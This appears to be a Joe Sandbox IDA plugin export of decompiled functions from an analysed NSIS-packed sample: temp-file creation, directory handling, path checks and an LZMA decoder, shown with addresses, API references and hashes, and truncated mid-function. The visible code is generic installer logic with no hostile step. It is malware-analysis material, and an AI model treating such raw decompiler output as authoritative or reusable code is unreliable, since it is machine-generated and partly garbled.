Associated: 00000004.00000002.1180453513.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180462662.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180466472.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180479878.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180487735.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180496022.0000000000459000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180520942.000000000045B000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180531476.000000000046B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_venxajlddf.jbxd

Similarity

API ID: CloseValuelstrlen
String ID: C:\Users\user\AppData\Local\Temp\nsoF8F7.tmp
API String ID: 2655323295-1463003800
Opcode ID: 9c86e53f0ab96bac3dc9ba6bf3699c46313c21c8edda6fdc1e85d5f454bbf74d
Instruction ID: a516967871aadb8e7373f7254d3c24ec0cdbd982f2b4049ed7d94b0996b6da2b
Opcode Fuzzy Hash: 9c86e53f0ab96bac3dc9ba6bf3699c46313c21c8edda6fdc1e85d5f454bbf74d
Instruction Fuzzy Hash: 4011AF71E00108BEEF10AFA1CE49EAEB6B8EB44354F11443AF404B61C1DBB98D409658

Uniqueness

Uniqueness Score: -1.00%

Function 00406187 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406187(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
				intOrPtr _v8;
				short _v12;
				short _t12;
				intOrPtr _t13;
				signed int _t14;
				WCHAR* _t17;
				signed int _t19;
				signed short _t23;
				WCHAR* _t26;

				_t26 = _a4;
				_t23 = 0x64;
				while(1) {
					_t12 =  *L"nsa"; // 0x73006e
					_t23 = _t23 - 1;
					_v12 = _t12;
					_t13 =  *0x40a5ac; // 0x61
					_v8 = _t13;
					_t14 = GetTickCount();
					_t19 = 0x1a;
					_v8 = _v8 + _t14 % _t19;
					_t17 = GetTempFileNameW(_a8,  &_v12, 0, _t26); // executed
					if(_t17 != 0) {
						break;
					}
					if(_t23 != 0) {
						continue;
					} else {
						 *_t26 =  *_t26 & _t23;
					}
					L4:
					return _t17;
				}
				_t17 = _t26;
				goto L4;
			}

0x0040618d
0x00406193
0x00406194
0x00406194
0x00406199
0x0040619a
0x0040619d
0x004061a2
0x004061a5
0x004061af
0x004061bc
0x004061c0
0x004061c8
0x00000000
0x00000000
0x004061cc
0x00000000
0x004061ce
0x004061ce
0x004061ce
0x004061d1
0x004061d4
0x004061d4
0x004061d7
0x00000000

APIs

GetTickCount.KERNEL32(7556D4C4,C:\Users\user\AppData\Local\Temp\,?,?,?,0040363E,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 004061A5
GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,?,0040363E,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 004061C0

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 0040618C
nsa, xrefs: 00406194

Memory Dump Source

Source File: 00000004.00000002.1180457129.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1180453513.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180462662.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180466472.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180479878.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180487735.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180496022.0000000000459000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180520942.000000000045B000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180531476.000000000046B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_venxajlddf.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: C:\Users\user\AppData\Local\Temp\$nsa
API String ID: 1716503409-4262883142
Opcode ID: 6315ab6e6f8253ba2c88c9b6803a176270f8621abb800126aa0f3c3b7b9ef66c
Instruction ID: 21b676f9b33da427d45e0b2d6905a63b6509bf3d89a4e990effff8b21c6fdcbe
Opcode Fuzzy Hash: 6315ab6e6f8253ba2c88c9b6803a176270f8621abb800126aa0f3c3b7b9ef66c
Instruction Fuzzy Hash: C3F09076700214BFEB008F59DD05E9AB7BCEBA1710F11803AEE05EB180E6B0A9648768

Uniqueness

Uniqueness Score: -1.00%

Function 004015C1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E004015C1(short __ebx, void* __eflags) {
				void* _t17;
				int _t23;
				void* _t25;
				signed char _t26;
				short _t28;
				short _t31;
				short* _t34;
				void* _t36;

				_t28 = __ebx;
				 *(_t36 + 8) = E00402DA6(0xfffffff0);
				_t17 = E00405FE2(_t16);
				_t32 = _t17;
				if(_t17 != __ebx) {
					do {
						_t34 = E00405F64(_t32, 0x5c);
						_t31 =  *_t34;
						 *_t34 = _t28;
						if(_t31 != _t28) {
							L5:
							_t25 = E00405C16( *(_t36 + 8));
						} else {
							_t42 =  *((intOrPtr*)(_t36 - 0x28)) - _t28;
							if( *((intOrPtr*)(_t36 - 0x28)) == _t28 || E00405C33(_t42) == 0) {
								goto L5;
							} else {
								_t25 = E00405B99( *(_t36 + 8)); // executed
							}
						}
						if(_t25 != _t28) {
							if(_t25 != 0xb7) {
								L9:
								 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
							} else {
								_t26 = GetFileAttributesW( *(_t36 + 8)); // executed
								if((_t26 & 0x00000010) == 0) {
									goto L9;
								}
							}
						}
						 *_t34 = _t31;
						_t32 = _t34 + 2;
					} while (_t31 != _t28);
				}
				if( *((intOrPtr*)(_t36 - 0x2c)) == _t28) {
					_push(0xfffffff5);
					E00401423();
				} else {
					E00401423(0xffffffe6);
					E00406668(L"C:\\Users\\Albus\\AppData\\Local\\Temp",  *(_t36 + 8));
					_t23 = SetCurrentDirectoryW( *(_t36 + 8)); // executed
					if(_t23 == 0) {
						 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
					}
				}
				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t36 - 4));
				return 0;
			}

0x004015c1
0x004015c9
0x004015cc
0x004015d1
0x004015d5
0x004015d7
0x004015df
0x004015e1
0x004015e4
0x004015ea
0x00401604
0x00401607
0x004015ec
0x004015ec
0x004015ef
0x00000000
0x004015fa
0x004015fd
0x004015fd
0x004015ef
0x0040160e
0x00401615
0x00401624
0x00401624
0x00401617
0x0040161a
0x00401622
0x00000000
0x00000000
0x00401622
0x00401615
0x00401627
0x0040162b
0x0040162c
0x004015d7
0x00401634
0x00401663
0x004022f1
0x00401636
0x00401638
0x00401645
0x0040164d
0x00401655
0x0040165b
0x0040165b
0x00401655
0x00402c2d
0x00402c39

APIs

Part of subcall function 00405FE2: CharNextW.USER32(?), ref: 00405FF0
Part of subcall function 00405FE2: CharNextW.USER32(00000000), ref: 00405FF5
Part of subcall function 00405FE2: CharNextW.USER32(00000000), ref: 0040600D

GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A

Part of subcall function 00405B99: CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405BDC

SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Local\Temp,?,00000000,000000F0), ref: 0040164D

Strings

C:\Users\user\AppData\Local\Temp, xrefs: 00401640

Memory Dump Source

Source File: 00000004.00000002.1180457129.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1180453513.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180462662.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180466472.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180479878.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180487735.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180496022.0000000000459000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180520942.000000000045B000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180531476.000000000046B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_venxajlddf.jbxd

Similarity

API ID: CharNext$Directory$AttributesCreateCurrentFile
String ID: C:\Users\user\AppData\Local\Temp
API String ID: 1892508949-2935972921
Opcode ID: 549c49a0165827fdc5d5d158968deb429f02c31064a37383ceaea4003741be7b
Instruction ID: a0118e7b9b939ef3ea3e51add98df8039a5aa70d3b8e99a19be4f9c31e9f39fe
Opcode Fuzzy Hash: 549c49a0165827fdc5d5d158968deb429f02c31064a37383ceaea4003741be7b
Instruction Fuzzy Hash: 04112231508105EBCF30AFA0CD4099E36A0EF15329B28493BF901B22F1DB3E4982DB5E

Uniqueness

Uniqueness Score: -1.00%

Function 0040603F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47
stringCOMMON

Download Yara Rule

C-Code - Quality: 53%

			E0040603F(void* __eflags, intOrPtr _a4) {
				int _t11;
				signed char* _t12;
				long _t16;
				intOrPtr _t18;
				intOrPtr* _t21;
				signed int _t23;

				E00406668(0x425f50, _a4);
				_t21 = E00405FE2(0x425f50);
				if(_t21 != 0) {
					E004068EF(_t21);
					if(( *0x42a278 & 0x00000080) == 0) {
						L5:
						_t23 = _t21 - 0x425f50 >> 1;
						while(1) {
							_t11 = lstrlenW(0x425f50);
							_push(0x425f50);
							if(_t11 <= _t23) {
								break;
							}
							_t12 = E0040699E();
							if(_t12 == 0 || ( *_t12 & 0x00000010) != 0) {
								E00405F83(0x425f50);
								continue;
							} else {
								goto L1;
							}
						}
						E00405F37();
						_t16 = GetFileAttributesW(??); // executed
						return 0 | _t16 != 0xffffffff;
					}
					_t18 =  *_t21;
					if(_t18 == 0 || _t18 == 0x5c) {
						goto L1;
					} else {
						goto L5;
					}
				}
				L1:
				return 0;
			}

0x0040604b
0x00406056
0x0040605a
0x00406061
0x0040606d
0x0040607d
0x0040607f
0x00406097
0x00406098
0x0040609f
0x004060a0
0x00000000
0x00000000
0x00406083
0x0040608a
0x00406092
0x00000000
0x00000000
0x00000000
0x00000000
0x0040608a
0x004060a2
0x004060a8
0x00000000
0x004060b6
0x0040606f
0x00406075
0x00000000
0x00000000
0x00000000
0x00000000
0x00406075
0x0040605c
0x00000000

APIs

Part of subcall function 00406668: lstrcpynW.KERNEL32(?,?,00000400,004037B0,00429260,NSIS Error), ref: 00406675

Part of subcall function 00405FE2: CharNextW.USER32(?), ref: 00405FF0
Part of subcall function 00405FE2: CharNextW.USER32(00000000), ref: 00405FF5
Part of subcall function 00405FE2: CharNextW.USER32(00000000), ref: 0040600D

lstrlenW.KERNEL32(00425F50,00000000,00425F50,00425F50,7556D4C4,?,755513E0,00405D94,?,7556D4C4,755513E0,00000000), ref: 00406098
GetFileAttributesW.KERNELBASE(00425F50,00425F50,00425F50,00425F50,00425F50,00425F50,00000000,00425F50,00425F50,7556D4C4,?,755513E0,00405D94,?,7556D4C4,755513E0), ref: 004060A8

Strings

P_B, xrefs: 00406045

Memory Dump Source

Source File: 00000004.00000002.1180457129.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1180453513.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180462662.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180466472.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180479878.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180487735.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180496022.0000000000459000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180520942.000000000045B000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180531476.000000000046B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_venxajlddf.jbxd

Similarity

API ID: CharNext$AttributesFilelstrcpynlstrlen
String ID: P_B
API String ID: 3248276644-906794629
Opcode ID: 900e3a3aedd828ccf636743a116f58552bc6887dcb5d3e9637a901da882d1290
Instruction ID: df110f430b83b9381375b5fd3fa67f6c4419d4890c6468873e0fced3c2676832
Opcode Fuzzy Hash: 900e3a3aedd828ccf636743a116f58552bc6887dcb5d3e9637a901da882d1290
Instruction Fuzzy Hash: 0DF07826144A1216E622B23A0C05BAF05098F82354B07063FFC93B22E1DF3C8973C43E

Uniqueness

Uniqueness Score: -1.00%

Function 00407194 Relevance: 5.2, APIs: 4, Instructions: 236
COMMON

Download Yara Rule

C-Code - Quality: 99%

			E00407194() {
				signed int _t530;
				void _t537;
				signed int _t538;
				signed int _t539;
				unsigned short _t569;
				signed int _t579;
				signed int _t607;
				void* _t627;
				signed int _t628;
				signed int _t635;
				signed int* _t643;
				void* _t644;

				L0:
				while(1) {
					L0:
					_t530 =  *(_t644 - 0x30);
					if(_t530 >= 4) {
					}
					 *(_t644 - 0x40) = 6;
					 *(_t644 - 0x7c) = 0x19;
					 *((intOrPtr*)(_t644 - 0x58)) = (_t530 << 7) +  *(_t644 - 4) + 0x360;
					while(1) {
						L145:
						 *(_t644 - 0x50) = 1;
						 *(_t644 - 0x48) =  *(_t644 - 0x40);
						while(1) {
							L149:
							if( *(_t644 - 0x48) <= 0) {
								goto L155;
							}
							L150:
							_t627 =  *(_t644 - 0x50) +  *(_t644 - 0x50);
							_t643 = _t627 +  *((intOrPtr*)(_t644 - 0x58));
							 *(_t644 - 0x54) = _t643;
							_t569 =  *_t643;
							_t635 = _t569 & 0x0000ffff;
							_t607 = ( *(_t644 - 0x10) >> 0xb) * _t635;
							if( *(_t644 - 0xc) >= _t607) {
								 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t607;
								 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t607;
								_t628 = _t627 + 1;
								 *_t643 = _t569 - (_t569 >> 5);
								 *(_t644 - 0x50) = _t628;
							} else {
								 *(_t644 - 0x10) = _t607;
								 *(_t644 - 0x50) =  *(_t644 - 0x50) << 1;
								 *_t643 = (0x800 - _t635 >> 5) + _t569;
							}
							if( *(_t644 - 0x10) >= 0x1000000) {
								L148:
								_t487 = _t644 - 0x48;
								 *_t487 =  *(_t644 - 0x48) - 1;
								L149:
								if( *(_t644 - 0x48) <= 0) {
									goto L155;
								}
								goto L150;
							} else {
								L154:
								L146:
								if( *(_t644 - 0x6c) == 0) {
									L169:
									 *(_t644 - 0x88) = 0x18;
									L170:
									_t579 = 0x22;
									memcpy( *(_t644 - 0x90), _t644 - 0x88, _t579 << 2);
									_t539 = 0;
									L172:
									return _t539;
								}
								L147:
								 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
								 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
								_t484 = _t644 - 0x70;
								 *_t484 =  &(( *(_t644 - 0x70))[1]);
								 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
								goto L148;
							}
							L155:
							_t537 =  *(_t644 - 0x7c);
							 *((intOrPtr*)(_t644 - 0x44)) =  *(_t644 - 0x50) - (1 <<  *(_t644 - 0x40));
							while(1) {
								L140:
								 *(_t644 - 0x88) = _t537;
								while(1) {
									L1:
									_t538 =  *(_t644 - 0x88);
									if(_t538 > 0x1c) {
										break;
									}
									L2:
									switch( *((intOrPtr*)(_t538 * 4 +  &M00407602))) {
										case 0:
											L3:
											if( *(_t644 - 0x6c) == 0) {
												goto L170;
											}
											L4:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											_t538 =  *( *(_t644 - 0x70));
											if(_t538 > 0xe1) {
												goto L171;
											}
											L5:
											_t542 = _t538 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t581);
											_push(9);
											_pop(_t582);
											_t638 = _t542 / _t581;
											_t544 = _t542 % _t581 & 0x000000ff;
											asm("cdq");
											_t633 = _t544 % _t582 & 0x000000ff;
											 *(_t644 - 0x3c) = _t633;
											 *(_t644 - 0x1c) = (1 << _t638) - 1;
											 *((intOrPtr*)(_t644 - 0x18)) = (1 << _t544 / _t582) - 1;
											_t641 = (0x300 << _t633 + _t638) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t644 - 0x78))) {
												L10:
												if(_t641 == 0) {
													L12:
													 *(_t644 - 0x48) =  *(_t644 - 0x48) & 0x00000000;
													 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t641 = _t641 - 1;
													 *((short*)( *(_t644 - 4) + _t641 * 2)) = 0x400;
												} while (_t641 != 0);
												goto L12;
											}
											L6:
											if( *(_t644 - 4) != 0) {
												GlobalFree( *(_t644 - 4));
											}
											_t538 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t644 - 4) = _t538;
											if(_t538 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t644 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t644 - 0x6c);
											if( *(_t644 - 0x6c) == 0) {
												L157:
												 *(_t644 - 0x88) = 1;
												goto L170;
											}
											L14:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x40) =  *(_t644 - 0x40) | ( *( *(_t644 - 0x70)) & 0x000000ff) <<  *(_t644 - 0x48) << 0x00000003;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											_t45 = _t644 - 0x48;
											 *_t45 =  *(_t644 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t644 - 0x48) < 4) {
												goto L13;
											}
											L16:
											_t550 =  *(_t644 - 0x40);
											if(_t550 ==  *(_t644 - 0x74)) {
												L20:
												 *(_t644 - 0x48) = 5;
												 *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) =  *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											L17:
											 *(_t644 - 0x74) = _t550;
											if( *(_t644 - 8) != 0) {
												GlobalFree( *(_t644 - 8));
											}
											_t538 = GlobalAlloc(0x40,  *(_t644 - 0x40)); // executed
											 *(_t644 - 8) = _t538;
											if(_t538 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t557 =  *(_t644 - 0x60) &  *(_t644 - 0x1c);
											 *(_t644 - 0x84) = 6;
											 *(_t644 - 0x4c) = _t557;
											_t642 =  *(_t644 - 4) + (( *(_t644 - 0x38) << 4) + _t557) * 2;
											goto L132;
										case 3:
											L21:
											__eflags =  *(_t644 - 0x6c);
											if( *(_t644 - 0x6c) == 0) {
												L158:
												 *(_t644 - 0x88) = 3;
												goto L170;
											}
											L22:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											_t67 = _t644 - 0x70;
											 *_t67 =  &(( *(_t644 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
											L23:
											 *(_t644 - 0x48) =  *(_t644 - 0x48) - 1;
											if( *(_t644 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t559 =  *_t642;
											_t626 = _t559 & 0x0000ffff;
											_t596 = ( *(_t644 - 0x10) >> 0xb) * _t626;
											if( *(_t644 - 0xc) >= _t596) {
												 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t596;
												 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t596;
												 *(_t644 - 0x40) = 1;
												_t560 = _t559 - (_t559 >> 5);
												__eflags = _t560;
												 *_t642 = _t560;
											} else {
												 *(_t644 - 0x10) = _t596;
												 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
												 *_t642 = (0x800 - _t626 >> 5) + _t559;
											}
											if( *(_t644 - 0x10) >= 0x1000000) {
												goto L139;
											} else {
												goto L137;
											}
										case 5:
											L137:
											if( *(_t644 - 0x6c) == 0) {
												L168:
												 *(_t644 - 0x88) = 5;
												goto L170;
											}
											L138:
											 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
											L139:
											_t537 =  *(_t644 - 0x84);
											L140:
											 *(_t644 - 0x88) = _t537;
											goto L1;
										case 6:
											L25:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L36:
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											L26:
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												L35:
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												L32:
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											L66:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												L68:
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											L67:
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											goto L132;
										case 8:
											L70:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xa;
												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
											} else {
												__eax =  *(__ebp - 0x38);
												__ecx =  *(__ebp - 4);
												__eax =  *(__ebp - 0x38) + 0xf;
												 *(__ebp - 0x84) = 9;
												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
											}
											goto L132;
										case 9:
											L73:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L90;
											}
											L74:
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											L75:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t259 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t259;
											0 | _t259 = _t259 + _t259 + 9;
											 *(__ebp - 0x38) = _t259 + _t259 + 9;
											goto L76;
										case 0xa:
											L82:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L84:
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											L83:
											__eax =  *(__ebp - 0x28);
											goto L89;
										case 0xb:
											L85:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L89:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L90:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L99:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L164:
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											L100:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t334 = __ebp - 0x70;
											 *_t334 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t334;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
